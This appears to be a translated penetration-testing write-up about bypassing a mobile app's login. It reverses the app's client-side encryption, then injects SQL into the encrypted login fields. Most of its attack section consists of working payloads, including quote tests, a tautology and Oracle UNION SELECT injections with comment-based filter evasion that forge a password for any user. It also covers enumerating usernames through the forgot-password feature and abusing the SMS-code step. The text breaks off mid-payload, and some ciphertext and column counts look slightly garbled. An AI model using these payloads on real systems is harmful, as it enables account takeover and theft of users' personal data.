Title: App Penetration - Face Recognition Login Bypass

1. APP packet capture and reverse cracking encryption algorithm

Open the APP is a login box

After catching the packet, the parameters were encrypted

Using Jadx off-source code, it was found that there was no shelling or confusion. It was very lucky.

According to experience, first search for keywords such as Encrypt, Decrypt, etc. and found that there is an encryptData function in Common.js

Positioning the past, a set of encryption and decryption algorithms are written and placed here

Put it in the browser console to debug, it's true

2. Find the injection point

First test the injection

Plain text: {'userName':'TEST'','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Password: QSXBDUSV0QpJkd5tWYR90SshkWzZFVipkWUNFcK1GZzpkeZVjWWJ2asJDZwxWRl5kUrRVMFtWZOBHWTVUMr1kWSZFV4tmRSBFbyIWcsV0YXRGbZdHcwEVTsd0T0J1RjFWNXNlMrBTUhZlbSRnTXF2SOVEVwZEbSBFczEWVxAjVLxmMUBHZzYVY0d1TYp0VhNDbXNFNsVVYQx2VWhkTX50U41WW3JVbNlmTuNFR4VVYSJVVUF DbGJlTWhVUxFTVhZHcXNVMspnVoBnbTlFcxY1QoBTWvBHMR1EbXJVc4VUZw0EbUBXOtFmSWh1TYZUbltEasdFW1ATTpxmMkBHbwE2cKpWW1okVilGatNFc5UVYWRGMZFTSW1kaa52UEhXVhplUsR1dwsWYOhGWTBXOVFmUxITWyI1VNpGcuJFSOdVYzw2VTVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Result: App returns exception

Plain text: {'userName':'TEST''','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Password: JdFMQJVRDlmQ2l3ahJlWXFmaox2VxAXVhBFbH5UeJd0YPVjMZNHcsJmSOh1UUFzalJlUxQ1MxsWZOxGWRFXNr1kRSxGV5NWbhpkWUNFVGdkY4NmVZBHZYFmSa52VZZUbNtEbyQFcGZlYphWbTVHbWF2Msd1UWhWbl5kVUJVcaZVY2B3VTpnWxIVYahVT0xGMjpkTWRFc50WYKhXbRllVXZVMjZVW1xmeSlGbyQGcsVUTCB3RU lXRrFWTkh1Uxx2aOpEbtllM41WTqxmbWRnWxQ2QoZ1VwRGWhpEaI5EVxUFZWB3VTJzaVFWaahkY510VldVMtZlNsRlYK5EWTREcGNWNwITWyZleWpFbyIWcsVkYDhmVaZVNw0UasJDZwx2aNZlUrRlNsVkVOxmMiFHbwE2SOpWWZVDMNpGatFVdsBzYKxmbTVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Results: App returns normal

Plain text: {'userName':'TEST'or'1'='1','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Password: k0VwAlUFNUaCZXerFWRspFcOd0VhZlbTBXOVFGMJpWW3VzaipGetdVdsBzYK5kVUZjRGZFUkhFV2ETVlJEctRVeVVkVPpkeaFHbr5kSOZVWzZkeWhGbyQGcstGZhhmVZl3bVFGUsdVV0p0RhtUNXdFckhVYKZlRhZTMV5kRw1mVwlTbhpkTuZFSwxGZ4BzVTpHbwUlTsJjYxxWRiNEaWplVWpnVoVzVPhkSXF2Msd1U3V0ah1kSUFVc4B DZKB3VTJzaVFWaahkY510VldVMtZ1MKV0VaxmMkBHbFVGMNZFVxYFbhpkWUNFcK1GZzpkeZVjWWJ2Vwh1T0xGMjpkTrd1dsRlYqR3VOhFbWFmdwd1UzpURXxmVsRleJdVYzw2VTlXVGJ1Twh1UVFTVhZHcXNlcwBTTphGbUpXTHF2Q1c1U6xWVltEb6lFVxsmYK5kaZVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Results: App returns normal

At this point, it can be judged that the login point is an injection, but the result is always "the username or password is wrong", which means that it is used ' or '1'='1

Based on the return result, the logic code at the login in the backend may be like this

userInfo='select * from userinfo where username=userName';

userPass=userInfo.password;if (userPass==password){return 'Login success';

}else{return 'Login failed';

}Constructing a universal password through Union injection can cause any user to log in. The test process is as follows

First use order by test, and know that the number of fields is 9, construct the payload

# Since the target server has filtering, here is a simple pass plaintext: {'userName':'TEST'union/**/select/**/null,null,null,null,null,null,null,null,null,null,null from dual-- ','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}ciphertext: JdFMQJ VRDlmQ2l3ahFkaipkTqZFdKdVY2B3VTFDb6ZFaw52UZBHbNtkTFRFcWtWZOJkehVUMrVmTwdFVzwGbh9EaYZVc1UkTKxmMUBHdyYVYShkY0xGMjpEbulVe3dlYrxmMiFHbwEWMjZ1V1AXVipkTYNFRaZkTOJVMURDbGJmSaR1UEp0RiNlSqlFMwBTUNx2VSFHbr5kSOx2Vzg3RTdlVIJWevxGZ0E zVTpHbwE1TkhkTwVDMkBTTVRVNsVVYQx2ROlXSHN2T1ITWzBHbSpGZuJFdsBzYK5kVUFjVrFWTGR1UwlTVhBTSql1d1smYqhXbXXTtR2SOVEVwZUMWhmWuNVSwZFZHFzVTJzawUVYkhkYJpFblVDMXNlesVVYPZEVVZTMVVmRwd1UysGMRFGbY9UeZxWZPhmVXNDcwEVTsdVUUhXRkJkTrl1baZ 0UhR2RNlXSXVWYkV1U6h2MWtmVIVGRKJzYXVTbZpHZzIVaGRlTIhHMjRDZGpVMoNTUp5kbWVnSyM2MktWW4VleS1kTIVGWSdFZ040aZpnWsJWaONDZIp0VNFTSERFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Results: App returns successfully

Since Oracle must also test the field data type when conducting union query, the corresponding field data type must also be tested. The final result is as follows

# Note that I modified password to 123 here to test whether the universal password constructed by Union is feasible: {'userName':'TEST'union/**/select/**/1,'123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123',1 from dual-- ','passWord':'123','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}ciphertext: QSXBDUSV0 QpJkd5tWYB1UdsBTTXFTbZBXOtFmSWh1TYZUbltEasdVevBTUNx2VSZTMF1kcSVFV2Ezah5EZYdVc1UUZWBXbUBzaVFGUsJTYYBnRkNXMXNlesVVZppERiRnUXFmdwd1UyZleWpFbuNFdsBzYK50aWBDMFZFUoh1Vzx2aOpkTrl1cKxWTpJlbTREeVFmRwd1UysGMVFGZIJWSaZFZzpkaXJDaYJm SOh1UEVDMkBzatR1MSpXUOxGWTBXOVFGMJpWW3VzaipGetd1ROJDZHFzVTpHbwUlTWhlUxhXVNpEbyQFcSpWTpJkbUVnTHJWYGpXWyAHMR1EbXVFWG1GZLh2aXFjWVJmSaR1UUBXMkNHarZlNsRlYK5EWTVTMVVmRwd1UysGMRFGbY9UeZxWZPhmVXNDcwEVTsdVUUhXRkNDZWdFeJFjUKJFWPR nTXJ2QOZFV650Vl5EbYJlNwBzYqxGWUVjVrV2SONTW1ETVlZEcuNleOdVZOxGWSZDcwMmashFV1Y1altkTzkVNxUVZGBnbTpnTXVmTshlU2AHMjZEcIRFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Results: The prompt is a weak password (indicating that this method is feasible)

Next, change one field and one field to determine which field corresponds to the password field. The test results are as follows

# Note that I changed password to Ceshi123@@@, it is no longer a weak password

Plain text: {'userName':'TEST'union/**/select/**/1,'123','123','Ceshi123@@@','123','123','123','123','123','123',1 from dual-- ','passWord':'Ceshi123@@@','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Password: k0VwAlUFNUaCZXerFWUPtEbIp1cWRlYKpFVTBnStR2cKpXW1olVitGbyQGcsVUZOJ1aUFTRrVmTwh1UFFzaNplUWRFerZkUQxmMiFHbFN2VkxWW3BHMR1EbH9EdSd0YhVzVTJzawEVYW5mU050VhtkTFRFcGxmUQB3MhVVMwY1S sJDVwR2MWFGdX9EWKdVYzw2VTRDbVFGUsdlVI50VONFetl1dS1WTp5kbTREeVFmUSVFVxwmRS5kVYFVcxUVY2B3VTFDb6ZFaw52UZBXMWNEawk1bwBTUNx2VSFHeFVGMNxGVwlTbhpkVY9EWG1WZLhGbXhVNw0UasJDZwxGMhNnSqlV NKZlYphWbTBXOVFmVkBTWxkkVNpmWuNFR4VVYCZVVVJUNrFmToNTYIZUbldlSUVFc50WYKRXbTpXSHd1TOpXWvp0aipkTYNFRsVEZ310aZ9mWGNVYkdUT5l0VlFGZVNFNkhVZLBHWTVVMrJ2Ms52U2wWRW5UNyQWNwtWZKJlVUVHZYV 2Swh1UVFzaiNDbuNlQKVlUSBHWTVVMFN2bKpXWzVTRNtkTzkVNxUVZGBnbTpnTXVmTshlU2AHMjZEcIRFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Result: Prompt login successful

After bypassing, I found that the program had an exception

Carefully observe the returned data, including username (username), staffId (employee number), email (email), staffName (name), tel (mobile number), and mobile (mobile number). However, these data were just constructed by myself. Here you should need a real user information for the subsequent login process.

Fortunately, there is still a place to obtain real user information

3. Breaking the username by forgetting your password

The app also has a function of forgetting password (usually you can explode the username here)

You can use the function of forgetting your password to determine whether the username exists. Here I just ran the dictionary and many usernames came out.

4. Cracking the SMS verification code

Naturally use these usernames to log in using SMS verification code

Get the verification code, then decrypt the data packet, and the surprising discovery returns the user's basic information

Retest payload based on login, and the final result is as follows

Plain text: {'userName':'TEST\'union/**/select/**/staffId,\'Qwe123@@@\',\'userName\',\'Qwe123@@@\',\'mobile\',\'mobile\',\'email\',\'865166023309431\',staffId from dual -- ','passWord':'Qwe123@@@','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}

Password: